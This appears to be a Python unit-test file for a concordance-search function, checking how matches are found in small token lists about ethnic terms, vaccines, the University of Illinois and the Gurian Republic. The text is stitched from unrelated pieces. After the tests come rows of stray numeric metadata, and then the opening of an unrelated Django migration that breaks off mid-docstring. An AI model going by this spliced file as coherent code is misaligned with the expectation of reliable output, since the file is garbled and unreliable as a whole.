                            'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
                            'minority',
                            'asian', 'to', 'be', 'a', 'piece', 'of', 'written', 'or', 'spoken', 'material', 'in',
                            'its',
                            'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
    pivot_token = ['minority']
    target_token = ['asian']
    result = find_concordance(pivot_token, target_token, (3, 3), (1, 10), corpus_token, corpus_token_cleaned, True,
                              True, False)
    expected_line = 'Asian BAME Asian understood minority , asian to be a ,piece of written or spoken material .'
    expected_left_line = 'BAME Asian understood'
    expected_left_context = 'Asian'
    expected_right_line = ', asian to be'
    expected_right_context = 'a ,piece of written or spoken material .'
    expected_query = 'minority'
    assert expected_line == result[0].line
    assert expected_left_context == result[0].left_context
    assert expected_left_line == result[0].left_span
    assert expected_query == result[0].query
    assert expected_right_line == result[0].right_span
    assert expected_right_context == result[0].right_context
def test_concordance_list_2(self):
    """Same corpus as list_1, but with the second boolean flag False:
    the right context extends past the sentence end ('in its primary')."""
    corpus_token = ['Traditionally', ',', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a', 'text',
                    'is',
                    'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
                    'minority',
                    ',', 'asian', 'to', 'be', 'a', ',' 'piece', 'of', 'written', 'or', 'spoken', 'material',
                    '.',
                    'in', 'its', 'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
    corpus_token_cleaned = ['Traditionally', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a',
                            'text',
                            'is',
                            'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
                            'minority',
                            'asian', 'to', 'be', 'a', 'piece', 'of', 'written', 'or', 'spoken', 'material',
                            'in',
                            'its',
                            'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
    pivot_token = ['minority']
    target_token = ['asian']
    result = find_concordance(pivot_token, target_token, (3, 3), (1, 10), corpus_token, corpus_token_cleaned,
                              True,
                              False,
                              False)
    expected_line = 'Asian BAME Asian understood minority , asian to be a ,piece of written or spoken material . ' \
                    'in its primary'
    expected_left_line = 'BAME Asian understood'
    expected_left_context = 'Asian'
    expected_right_line = ', asian to be'
    expected_right_context = 'a ,piece of written or spoken material . in its primary'
    expected_query = 'minority'
    assert expected_line == result[0].line
    assert expected_left_context == result[0].left_context
    assert expected_left_line == result[0].left_span
    assert expected_query == result[0].query
    assert expected_right_line == result[0].right_span
    assert expected_right_context == result[0].right_context
def test_concordance_list_3(self):
    """Empty pivot and target token lists produce an empty result list."""
    corpus_token = ['Traditionally', ',', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a', 'text',
                    'is',
                    'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
                    'minority',
                    ',', 'asian', 'to', 'be', 'a', ',' 'piece', 'of', 'written', 'or', 'spoken', 'material',
                    '.',
                    'in', 'its', 'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
    corpus_token_cleaned = ['Traditionally', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a',
                            'text',
                            'is',
                            'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
                            'minority',
                            'asian', 'to', 'be', 'a', 'piece', 'of', 'written', 'or', 'spoken', 'material',
                            'in',
                            'its',
                            'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
    pivot_token = []
    target_token = []
    result = find_concordance(pivot_token, target_token, (3, 3), (1, 10), corpus_token, corpus_token_cleaned,
                              True,
                              False,
                              False)
    expected = []
    assert expected == result
def test_concordance_list_4(self):
    """With a (1, 1) span the target 'Asian' does not fall next to the
    pivot 'minority', so no concordance is found."""
    corpus_token = ['Traditionally', ',', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a', 'text',
                    'is',
                    'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
                    'minority',
                    ',', 'asian', 'to', 'be', 'a', ',' 'piece', 'of', 'written', 'or', 'spoken', 'material',
                    '.',
                    'in', 'its', 'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
    corpus_token_cleaned = ['Traditionally', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a',
                            'text',
                            'is',
                            'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood',
                            'minority',
                            'asian', 'to', 'be', 'a', 'piece', 'of', 'written', 'or', 'spoken', 'material',
                            'in',
                            'its',
                            'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
    pivot_token = ['minority']
    target_token = ['Asian']
    actual = find_concordance(pivot_token, target_token, (1, 1), (1, 10), corpus_token, corpus_token_cleaned,
                              True,
                              False,
                              False)
    expected = []
    assert expected == actual
def test_concordance_list_1_lowercased_cleaned_corpus(self):
    """Like list_1, but the cleaned corpus is lower-cased and the final
    flag is True; the expected output is unchanged.

    Fix: this method was previously a second `test_concordance_list_1`,
    which shadowed the earlier definition so only this one ran. Renamed so
    both execute. NOTE(review): confirm the un-shadowed original still
    passes once it runs again.
    """
    corpus_token = ['Traditionally', ',', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a', 'text', 'is',
                    'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood', 'minority',
                    ',', 'asian', 'to', 'be', 'a', ',' 'piece', 'of', 'written', 'or', 'spoken', 'material', '.',
                    'in', 'its', 'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
    corpus_token_cleaned = ['traditionally', 'black', 'black', 'asians', 'blacks', 'blacks', 'bame', 'a', 'text',
                            'is',
                            'bame', 'asian', 'bAME', 'asian', 'bAME', 'asian', 'bame', 'asian', 'understood',
                            'minority',
                            'asian', 'to', 'be', 'a', 'piece', 'of', 'written', 'or', 'spoken', 'material', 'in',
                            'its',
                            'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
    pivot_token = ['minority']
    target_token = ['asian']
    result = find_concordance(pivot_token, target_token, (3, 3), (1, 10), corpus_token, corpus_token_cleaned, True,
                              True, True)
    expected_line = 'Asian BAME Asian understood minority , asian to be a ,piece of written or spoken material .'
    expected_left_line = 'BAME Asian understood'
    expected_left_context = 'Asian'
    expected_right_line = ', asian to be'
    expected_right_context = 'a ,piece of written or spoken material .'
    expected_query = 'minority'
    assert expected_line == result[0].line
    assert expected_left_context == result[0].left_context
    assert expected_left_line == result[0].left_span
    assert expected_query == result[0].query
    assert expected_right_line == result[0].right_span
    assert expected_right_context == result[0].right_context
def test_concordance_list_5(self):
    """Oversized span (100, 100) with a small (2, 2) context window:
    the span absorbs the whole sentence, leaving empty/whitespace contexts."""
    corpus_token = ['Hi','!', 'I', 'am', 'black', 'and', 'I', 'am', 'going', 'to', 'get', 'the', 'vaccine', 'next',
                    'week', '.', 'Black', 'and', 'vaccine', '=', 'love', '.', 'That', 'is', 'all', 'I', 'am',
                    'going', 'to', 'say', '!']
    corpus_token_cleaned = ['Hi', 'I', 'am', 'black', 'and', 'I', 'am', 'going', 'to', 'get', 'the', 'vaccine',
                            'next', 'week', 'Black', 'and', 'vaccine', 'love', 'That', 'is', 'all', 'I', 'am',
                            'going', 'to', 'say']
    pivot_token = ['vaccine']
    target_token = ['Black']
    result = find_concordance(pivot_token, target_token, (100, 100), (2, 2), corpus_token, corpus_token_cleaned, True,
                              True, False)
    expected_line = ' Hi ! I am black and I am going to get the vaccine next week . '
    expected_left_line = 'Hi ! I am black and I am going to get the'
    expected_left_context = ''
    expected_right_line = 'next week .'
    expected_right_context = ' '
    expected_query = 'vaccine'
    assert expected_line == result[0].line
    assert expected_left_context == result[0].left_context
    assert expected_left_line == result[0].left_span
    assert expected_query == result[0].query
    assert expected_right_line == result[0].right_span
    assert expected_right_context == result[0].right_context
def test_concordance_list_6_wide_context(self):
    """Asymmetric (10, 3) span with an oversized (100, 100) context:
    the expected line covers the whole corpus.

    Fix: this method was previously one of three `test_concordance_list_6`
    definitions; only the last one ran because the later definitions
    shadowed the earlier ones. Renamed so it executes. NOTE(review):
    confirm it still passes now that it actually runs.
    """
    corpus_token = ['Hi','!', 'I', 'am', 'black', 'and', 'I', 'am', 'going', 'to', 'get', 'the', 'vaccine', 'next',
                    'week', '.', 'Black', 'and', 'vaccine', '=', 'love', '.', 'That', 'is', 'all', 'I', 'am',
                    'going', 'to', 'say', '!']
    corpus_token_cleaned = ['Hi', 'I', 'am', 'black', 'and', 'I', 'am', 'going', 'to', 'get', 'the', 'vaccine',
                            'next', 'week', 'Black', 'and', 'vaccine', 'love', 'That', 'is', 'all', 'I', 'am',
                            'going', 'to', 'say']
    pivot_token = ['vaccine']
    target_token = ['black']
    result = find_concordance(pivot_token, target_token, (10, 3), (100, 100), corpus_token, corpus_token_cleaned, True,
                              False, False)
    expected_line = 'Hi ! I am black and I am going to get the vaccine next week . Black and vaccine = love . That is all I am going to say !'
    expected_left_line = 'I am black and I am going to get the'
    expected_left_context = 'Hi !'
    expected_right_line = 'next week . Black'
    expected_right_context = 'and vaccine = love . That is all I am going to say !'
    expected_query = 'vaccine'
    assert expected_line == result[0].line
    assert expected_left_context == result[0].left_context
    assert expected_left_line == result[0].left_span
    assert expected_query == result[0].query
    assert expected_right_line == result[0].right_span
    assert expected_right_context == result[0].right_context
def test_concordance_list_6_presidents_corpus(self):
    """Pivot 'University' / target 'Illinois' over a longer corpus, with
    the cleaned corpus also passed as the third corpus argument.

    Fix: this method was previously one of three `test_concordance_list_6`
    definitions; only the last one ran because the later definitions
    shadowed the earlier ones. Renamed so it executes. NOTE(review):
    confirm it still passes now that it actually runs.
    """
    corpus_token = ['There', 'have', 'been', '20', 'presidents', 'of', 'the', 'University', 'of', 'Illinois', 'system', ',', 'a', 'system', 'of', 'public', 'universities', 'in', 'the', 'U', '.', 'S', '.', 'state', 'of', 'Illinois', '.', 'The', 'president', 'is', 'the', 'chief', 'executive', 'officer', 'and', 'a', 'faculty', 'member', 'of', 'each', 'of', 'its', 'colleges', ',', 'schools', ',', 'institutions', ',', 'and', 'divisions', '.', 'Elected', 'by', 'the', 'board', 'of', 'trustees', ',', 'the', 'president', 'is', 'responsible', 'to', 'them', 'for', 'the', 'operation', 'of', 'the', 'system', 'by', 'preparing', 'budgets', ',', 'recommending', 'persons', 'for', 'appointment', 'to', 'university', 'positions', ',', 'and', 'enforcing', 'of', 'the', 'rules', 'and', 'regulations', 'of', 'the', 'universities', '.', 'Following', 'the', 'establishment', 'of', 'the', 'office', 'in', '1867', ',', 'John', 'Milton', 'Gregory', 'served', 'as', 'the', 'first', 'president', ',', 'originally', 'titled', '&', 'quot', ';', 'regent', '&', 'quot', ';', '.', 'Three', 'presidents', ',', 'Lloyd', 'Morey', ',', 'James', 'J', '.', 'Stukel', ',', 'and', 'Robert', 'A', '.', 'Easter', ',', 'are', 'alumni', 'of', 'the', 'University', 'of', 'Illinois', 'Urbana', '-', 'Champaign', '.', 'The', 'current', 'president', 'is', 'Timothy', 'L', '.', 'Killeen', ',', 'who', 'has', 'held', 'the', 'position', 'since', '2015', '.']
    corpus_token_cleaned = ['There', 'have', 'been', '20', 'presidents', 'of', 'the', 'University', 'of', 'Illinois', 'system', 'a', 'system', 'of', 'public', 'universities', 'in', 'the', 'U', 'S', 'state', 'of', 'Illinois', 'The', 'president', 'is', 'the', 'chief', 'executive', 'officer', 'and', 'a', 'faculty', 'member', 'of', 'each', 'of', 'its', 'colleges','schools', 'institutions', 'and', 'divisions','Elected', 'by', 'the', 'board', 'of', 'trustees', 'the', 'president', 'is', 'responsible', 'to', 'them', 'for', 'the', 'operation', 'of', 'the', 'system', 'by', 'preparing', 'budgets', 'recommending', 'persons', 'for', 'appointment', 'to', 'university', 'positions', 'and', 'enforcing', 'of', 'the', 'rules', 'and', 'regulations', 'of', 'the', 'universities', 'Following', 'the', 'establishment', 'of', 'the', 'office', 'in', '1867', 'John', 'Milton', 'Gregory', 'served', 'as', 'the', 'first', 'president', 'originally', 'titled', 'quot', 'regent', 'quot','Three', 'presidents','Lloyd', 'Morey', 'James', 'J', 'Stukel','and', 'Robert', 'A', 'Easter', 'are', 'alumni', 'of', 'the', 'University', 'of', 'Illinois', 'Urbana', 'Champaign', 'The', 'current', 'president', 'is', 'Timothy', 'L','Killeen', 'who', 'has', 'held', 'the', 'position', 'since', '2015']
    pivot_token = ['University']
    target_token = ['Illinois']
    result = find_concordance(pivot_token, target_token, (10, 3), (1, 2), corpus_token, corpus_token_cleaned,corpus_token_cleaned, True,
                              False, False)
    expected_line = ' There have been 20 presidents of the University of Illinois system , a system'
    expected_left_line = 'There have been 20 presidents of the'
    expected_left_context = ''
    expected_right_line = 'of Illinois system ,'
    expected_right_context = 'a system'
    expected_query = 'University'
    assert expected_line == result[0].line
    assert expected_left_context == result[0].left_context
    assert expected_left_line == result[0].left_span
    assert expected_query == result[0].query
    assert expected_right_line == result[0].right_span
    assert expected_right_context == result[0].right_context
def test_concordance_list_6(self):
    """Pivot 'Russian' / target 'Revolution' with a distinct un-stemmed
    corpus passed as the third corpus argument.

    NOTE(review): two earlier methods in this class share this exact name;
    as written, only this last definition is collected and run.
    """
    corpus_token = ['The', 'Gurian', 'Republic', 'was', 'an', 'insurrection', 'and', 'protest', 'movement', 'in', 'the', 'western', 'Georgian', 'region', 'of', 'Guria', 'between', '1902', 'and', '1906', ',', 'against', 'the', 'Russian', 'Empire', '.', 'It', 'arose', 'from', 'a', 'revolt', 'over', 'land', 'grazing', 'rights', ';', 'taxation', ',', 'land', 'ownership', 'and', 'economic', 'factors', 'were', 'also', 'concerns', '.', 'The', 'Republic', 'established', 'its', 'own', 'system', 'of', 'government', ',', 'although', 'it', 'was', 'not', 'anti', '-', 'Russian', ',', 'desiring', 'to', 'remain', 'within', 'the', 'Empire', '.', 'The', '1905', 'Russian', 'Revolution', 'led', 'to', 'uprisings', 'throughout', 'the', 'Empire', ',', 'including', 'Georgia', ',', 'and', 'in', 'reaction', 'the', 'imperial', 'authorities', 'deployed', 'the', 'military', 'to', 'end', 'the', 'rebellions', '.', 'The', 'peasants', 'were', 'able', 'to', 'fend', 'off', 'a', 'small', 'force', 'of', 'Cossacks', ',', 'but', 'overwhelming', 'military', 'force', 'was', 'used', 'to', 're', '-', 'assert', 'control', 'in', '1906', '.', 'Some', 'of', 'the', 'Republic', '&', '#', 'x27', ';', 's', 'leaders', 'were', 'executed', ',', 'imprisoned', 'or', 'exiled', ',', 'but', 'others', 'later', 'played', 'prominent', 'roles', 'in', 'the', '1918', '–', '1921', 'Democratic', 'Republic', 'of', 'Georgia', '.', 'The', 'Gurian', 'Republic', 'demonstrated', 'that', 'peasants', 'could', 'participate', 'in', 'the', 'socialist', 'movement', ',', 'an', 'idea', 'previously', 'downplayed', 'by', 'leading', 'Marxists', '.']
    corpus_token_cleaned = ['The', 'Gurian', 'Republic', 'insurrection', 'protest', 'movement', 'western', 'Georgian', 'region', 'Guria', '1902', '1906', 'Russian', 'Empire', 'It', 'arose', 'revolt', 'land', 'grazing', 'rights', 'taxation', 'land', 'ownership', 'economic', 'factors', 'also', 'concerns', 'The', 'Republic', 'established', 'system', 'government', 'although', 'anti', 'Russian', 'desiring', 'remain', 'within', 'Empire', 'The', '1905', 'Russian', 'Revolution', 'led', 'uprisings', 'throughout', 'Empire', 'including', 'Georgia', 'reaction', 'imperial', 'authorities', 'deployed', 'military', 'end', 'rebellions', 'The', 'peasants', 'able', 'fend', 'small', 'force', 'Cossacks', 'overwhelming', 'military', 'force', 'used', 're', 'assert', 'control', '1906', 'Some', 'Republic', 'x27', 's', 'leaders', 'executed', 'imprisoned', 'exiled', 'others', 'later', 'played', 'prominent', 'roles', '1918', '1921', 'Democratic', 'Republic', 'Georgia', 'The', 'Gurian', 'Republic', 'demonstrated', 'peasants', 'participate', 'socialist', 'movement', 'idea', 'previously', 'downplayed', 'leading', 'Marxists']
    corpus_wo_stamming = ['The', 'Gurian', 'Republic', 'insurrection', 'protest', 'movement', 'western', 'Georgian', 'region', 'Guria', '1902', '1906', 'Russian', 'Empire', 'It', 'arose', 'revolt', 'land', 'grazing', 'rights', 'taxation', 'land', 'ownership', 'economic', 'factors', 'also', 'concerns', 'The', 'Republic', 'established', 'system', 'government', 'although', 'anti', 'Russian', 'desiring', 'remain', 'within', 'Empire', 'The', '1905', 'Russian', 'Revolution', 'led', 'uprisings', 'throughout', 'Empire', 'including', 'Georgia', 'reaction', 'imperial', 'authorities', 'deployed', 'military', 'end', 'rebellions', 'The', 'peasants', 'able', 'fend', 'small', 'force', 'Cossacks', 'overwhelming', 'military', 'force', 'used', 're', 'assert', 'control', '1906', 'Some', 'Republic', 'x27', 's', 'leaders', 'executed', 'imprisoned', 'exiled', 'others', 'later', 'played', 'prominent', 'roles', '1918', '1921', 'Democratic', 'Republic', 'Georgia', 'The', 'Gurian', 'Republic', 'demonstrated', 'peasants', 'participate', 'socialist', 'movement', 'idea', 'previously', 'downplayed', 'leading', 'Marxists']
    pivot_token = ['Russian']
    target_token = ['Revolution']
    result = find_concordance(pivot_token, target_token, (5, 5), (2, 2), corpus_token, corpus_token_cleaned,corpus_wo_stamming, True,
                              True, False)
    expected_line = ' . The 1905 Russian Revolution led to uprisings throughout the Empire , including Georgia'
    expected_left_line = '. The 1905'
    expected_left_context = ' '
    expected_right_line = 'Revolution led to uprisings throughout the Empire ,'
    expected_right_context = 'including Georgia'
    expected_query = 'Russian'
    assert expected_line == result[0].line
    assert expected_left_context == result[0].left_context
    assert expected_left_line == result[0].left_span
    assert expected_query == result[0].query
    assert expected_right_line == result[0].right_span
    assert expected_right_context == result[0].right_context
def test_concordance_list_7(self):
    """Concordance lookup for pivot 'Empire' with target 'It'.

    Uses a raw-token window of (5, 5) and a cleaned-context window of
    (2, 2); checks every field of the first returned concordance entry.
    """
    # Full tokenisation of the sample paragraph, punctuation kept.
    corpus_token = ['The', 'Gurian', 'Republic', 'was', 'an', 'insurrection', 'and', 'protest', 'movement', 'in', 'the', 'western', 'Georgian', 'region', 'of', 'Guria', 'between', '1902', 'and', '1906', ',', 'against', 'the', 'Russian', 'Empire', '.', 'It', 'arose', 'from', 'a', 'revolt', 'over', 'land', 'grazing', 'rights', ';', 'taxation', ',', 'land', 'ownership', 'and', 'economic', 'factors', 'were', 'also', 'concerns', '.', 'The', 'Republic', 'established', 'its', 'own', 'system', 'of', 'government', ',', 'although', 'it', 'was', 'not', 'anti', '-', 'Russian', ',', 'desiring', 'to', 'remain', 'within', 'the', 'Empire', '.', 'The', '1905', 'Russian', 'Revolution', 'led', 'to', 'uprisings', 'throughout', 'the', 'Empire', ',', 'including', 'Georgia', ',', 'and', 'in', 'reaction', 'the', 'imperial', 'authorities', 'deployed', 'the', 'military', 'to', 'end', 'the', 'rebellions', '.', 'The', 'peasants', 'were', 'able', 'to', 'fend', 'off', 'a', 'small', 'force', 'of', 'Cossacks', ',', 'but', 'overwhelming', 'military', 'force', 'was', 'used', 'to', 're', '-', 'assert', 'control', 'in', '1906', '.', 'Some', 'of', 'the', 'Republic', '&', '#', 'x27', ';', 's', 'leaders', 'were', 'executed', ',', 'imprisoned', 'or', 'exiled', ',', 'but', 'others', 'later', 'played', 'prominent', 'roles', 'in', 'the', '1918', '–', '1921', 'Democratic', 'Republic', 'of', 'Georgia', '.', 'The', 'Gurian', 'Republic', 'demonstrated', 'that', 'peasants', 'could', 'participate', 'in', 'the', 'socialist', 'movement', ',', 'an', 'idea', 'previously', 'downplayed', 'by', 'leading', 'Marxists', '.']
    # Same text with stop-words and punctuation removed (cleaned view).
    corpus_token_cleaned = ['The', 'Gurian', 'Republic', 'insurrection', 'protest', 'movement', 'western', 'Georgian', 'region', 'Guria', '1902', '1906', 'Russian', 'Empire', 'It', 'arose', 'revolt', 'land', 'grazing', 'rights', 'taxation', 'land', 'ownership', 'economic', 'factors', 'also', 'concerns', 'The', 'Republic', 'established', 'system', 'government', 'although', 'anti', 'Russian', 'desiring', 'remain', 'within', 'Empire', 'The', '1905', 'Russian', 'Revolution', 'led', 'uprisings', 'throughout', 'Empire', 'including', 'Georgia', 'reaction', 'imperial', 'authorities', 'deployed', 'military', 'end', 'rebellions', 'The', 'peasants', 'able', 'fend', 'small', 'force', 'Cossacks', 'overwhelming', 'military', 'force', 'used', 're', 'assert', 'control', '1906', 'Some', 'Republic', 'x27', 's', 'leaders', 'executed', 'imprisoned', 'exiled', 'others', 'later', 'played', 'prominent', 'roles', '1918', '1921', 'Democratic', 'Republic', 'Georgia', 'The', 'Gurian', 'Republic', 'demonstrated', 'peasants', 'participate', 'socialist', 'movement', 'idea', 'previously', 'downplayed', 'leading', 'Marxists']
    # Cleaned tokens prior to stemming; identical to the cleaned list here.
    corpus_wo_stamming = ['The', 'Gurian', 'Republic', 'insurrection', 'protest', 'movement', 'western', 'Georgian', 'region', 'Guria', '1902', '1906', 'Russian', 'Empire', 'It', 'arose', 'revolt', 'land', 'grazing', 'rights', 'taxation', 'land', 'ownership', 'economic', 'factors', 'also', 'concerns', 'The', 'Republic', 'established', 'system', 'government', 'although', 'anti', 'Russian', 'desiring', 'remain', 'within', 'Empire', 'The', '1905', 'Russian', 'Revolution', 'led', 'uprisings', 'throughout', 'Empire', 'including', 'Georgia', 'reaction', 'imperial', 'authorities', 'deployed', 'military', 'end', 'rebellions', 'The', 'peasants', 'able', 'fend', 'small', 'force', 'Cossacks', 'overwhelming', 'military', 'force', 'used', 're', 'assert', 'control', '1906', 'Some', 'Republic', 'x27', 's', 'leaders', 'executed', 'imprisoned', 'exiled', 'others', 'later', 'played', 'prominent', 'roles', '1918', '1921', 'Democratic', 'Republic', 'Georgia', 'The', 'Gurian', 'Republic', 'demonstrated', 'peasants', 'participate', 'socialist', 'movement', 'idea', 'previously', 'downplayed', 'leading', 'Marxists']
    pivot_token = ['Empire']
    target_token = ['It']
    # NOTE(review): the three trailing booleans (True, True, False) look
    # like matching-mode flags of find_concordance -- confirm their meaning
    # at the function definition.
    result = find_concordance(pivot_token, target_token, (5, 5), (2, 2), corpus_token, corpus_token_cleaned,corpus_wo_stamming, True,
    True, False)
    # Expected concordance fields around the first 'Empire' occurrence.
    expected_line = 'western Georgian and 1906 , against the Russian Empire . It arose from a revolt over land grazing rights ; taxation'
    expected_left_line = 'and 1906 , against the Russian'
    expected_left_context = 'western Georgian'
    expected_right_line ='. It arose from a revolt over land grazing'
    expected_right_context = 'rights ; taxation'
    expected_query = 'Empire'
    assert expected_line == result[0].line
    assert expected_left_context == result[0].left_context
    assert expected_left_line == result[0].left_span
    assert expected_query == result[0].query
    assert expected_right_line == result[0].right_span
    assert expected_right_context == result[0].right_context
def test_concordance_list_8(self):
    """Same query as test_concordance_list_7 ('Empire' / 'It') but with the
    second boolean flag flipped to False.

    The expected output is identical to test_concordance_list_7, i.e. that
    flag does not affect this particular match.
    """
    # Full tokenisation of the sample paragraph, punctuation kept.
    corpus_token = ['The', 'Gurian', 'Republic', 'was', 'an', 'insurrection', 'and', 'protest', 'movement', 'in', 'the', 'western', 'Georgian', 'region', 'of', 'Guria', 'between', '1902', 'and', '1906', ',', 'against', 'the', 'Russian', 'Empire', '.', 'It', 'arose', 'from', 'a', 'revolt', 'over', 'land', 'grazing', 'rights', ';', 'taxation', ',', 'land', 'ownership', 'and', 'economic', 'factors', 'were', 'also', 'concerns', '.', 'The', 'Republic', 'established', 'its', 'own', 'system', 'of', 'government', ',', 'although', 'it', 'was', 'not', 'anti', '-', 'Russian', ',', 'desiring', 'to', 'remain', 'within', 'the', 'Empire', '.', 'The', '1905', 'Russian', 'Revolution', 'led', 'to', 'uprisings', 'throughout', 'the', 'Empire', ',', 'including', 'Georgia', ',', 'and', 'in', 'reaction', 'the', 'imperial', 'authorities', 'deployed', 'the', 'military', 'to', 'end', 'the', 'rebellions', '.', 'The', 'peasants', 'were', 'able', 'to', 'fend', 'off', 'a', 'small', 'force', 'of', 'Cossacks', ',', 'but', 'overwhelming', 'military', 'force', 'was', 'used', 'to', 're', '-', 'assert', 'control', 'in', '1906', '.', 'Some', 'of', 'the', 'Republic', '&', '#', 'x27', ';', 's', 'leaders', 'were', 'executed', ',', 'imprisoned', 'or', 'exiled', ',', 'but', 'others', 'later', 'played', 'prominent', 'roles', 'in', 'the', '1918', '–', '1921', 'Democratic', 'Republic', 'of', 'Georgia', '.', 'The', 'Gurian', 'Republic', 'demonstrated', 'that', 'peasants', 'could', 'participate', 'in', 'the', 'socialist', 'movement', ',', 'an', 'idea', 'previously', 'downplayed', 'by', 'leading', 'Marxists', '.']
    # Same text with stop-words and punctuation removed (cleaned view).
    corpus_token_cleaned = ['The', 'Gurian', 'Republic', 'insurrection', 'protest', 'movement', 'western', 'Georgian', 'region', 'Guria', '1902', '1906', 'Russian', 'Empire', 'It', 'arose', 'revolt', 'land', 'grazing', 'rights', 'taxation', 'land', 'ownership', 'economic', 'factors', 'also', 'concerns', 'The', 'Republic', 'established', 'system', 'government', 'although', 'anti', 'Russian', 'desiring', 'remain', 'within', 'Empire', 'The', '1905', 'Russian', 'Revolution', 'led', 'uprisings', 'throughout', 'Empire', 'including', 'Georgia', 'reaction', 'imperial', 'authorities', 'deployed', 'military', 'end', 'rebellions', 'The', 'peasants', 'able', 'fend', 'small', 'force', 'Cossacks', 'overwhelming', 'military', 'force', 'used', 're', 'assert', 'control', '1906', 'Some', 'Republic', 'x27', 's', 'leaders', 'executed', 'imprisoned', 'exiled', 'others', 'later', 'played', 'prominent', 'roles', '1918', '1921', 'Democratic', 'Republic', 'Georgia', 'The', 'Gurian', 'Republic', 'demonstrated', 'peasants', 'participate', 'socialist', 'movement', 'idea', 'previously', 'downplayed', 'leading', 'Marxists']
    # Cleaned tokens prior to stemming; identical to the cleaned list here.
    corpus_wo_stamming = ['The', 'Gurian', 'Republic', 'insurrection', 'protest', 'movement', 'western', 'Georgian', 'region', 'Guria', '1902', '1906', 'Russian', 'Empire', 'It', 'arose', 'revolt', 'land', 'grazing', 'rights', 'taxation', 'land', 'ownership', 'economic', 'factors', 'also', 'concerns', 'The', 'Republic', 'established', 'system', 'government', 'although', 'anti', 'Russian', 'desiring', 'remain', 'within', 'Empire', 'The', '1905', 'Russian', 'Revolution', 'led', 'uprisings', 'throughout', 'Empire', 'including', 'Georgia', 'reaction', 'imperial', 'authorities', 'deployed', 'military', 'end', 'rebellions', 'The', 'peasants', 'able', 'fend', 'small', 'force', 'Cossacks', 'overwhelming', 'military', 'force', 'used', 're', 'assert', 'control', '1906', 'Some', 'Republic', 'x27', 's', 'leaders', 'executed', 'imprisoned', 'exiled', 'others', 'later', 'played', 'prominent', 'roles', '1918', '1921', 'Democratic', 'Republic', 'Georgia', 'The', 'Gurian', 'Republic', 'demonstrated', 'peasants', 'participate', 'socialist', 'movement', 'idea', 'previously', 'downplayed', 'leading', 'Marxists']
    pivot_token = ['Empire']
    target_token = ['It']
    # Flags here are (True, False, False); only the second flag differs
    # from test_concordance_list_7 -- confirm its semantics at the
    # find_concordance definition.
    result = find_concordance(pivot_token, target_token, (5, 5), (2, 2), corpus_token, corpus_token_cleaned,corpus_wo_stamming, True,
    False, False)
    # Expected concordance fields around the first 'Empire' occurrence.
    expected_line = 'western Georgian and 1906 , against the Russian Empire . It arose from a revolt over land grazing rights ; taxation'
    expected_left_line = 'and 1906 , against the Russian'
    expected_left_context = 'western Georgian'
    expected_right_line ='. It arose from a revolt over land grazing'
    expected_right_context = 'rights ; taxation'
    expected_query = 'Empire'
    assert expected_line == result[0].line
    assert expected_left_context == result[0].left_context
    assert expected_left_line == result[0].left_span
    assert expected_query == result[0].query
    assert expected_right_line == result[0].right_span
    assert expected_right_context == result[0].right_context
| 99.48265
| 1,601
| 0.543157
| 3,152
| 31,536
| 5.313135
| 0.083439
| 0.046814
| 0.027587
| 0.032245
| 0.963814
| 0.961545
| 0.957246
| 0.949603
| 0.944945
| 0.942079
| 0
| 0.01689
| 0.233987
| 31,536
| 316
| 1,602
| 99.797468
| 0.676243
| 0.001839
| 0
| 0.801471
| 0
| 0.011029
| 0.385148
| 0
| 0
| 0
| 0
| 0
| 0.238971
| 1
| 0.040441
| false
| 0
| 0.014706
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b7d2ce6c32df37d92b8fc43e772c5879283492fb
| 1,684
|
py
|
Python
|
django/polls/migrations/0003_auto_20171129_1149.py
|
rachit173/webtestgen
|
e68d179a7ef9f69a1348950d49676e0316f9b978
|
[
"MIT"
] | null | null | null |
django/polls/migrations/0003_auto_20171129_1149.py
|
rachit173/webtestgen
|
e68d179a7ef9f69a1348950d49676e0316f9b978
|
[
"MIT"
] | null | null | null |
django/polls/migrations/0003_auto_20171129_1149.py
|
rachit173/webtestgen
|
e68d179a7ef9f69a1348950d49676e0316f9b978
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-29 11:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make every MCQ image column an optional ImageField.

    All seven image columns on the ``mcq`` model receive the exact same
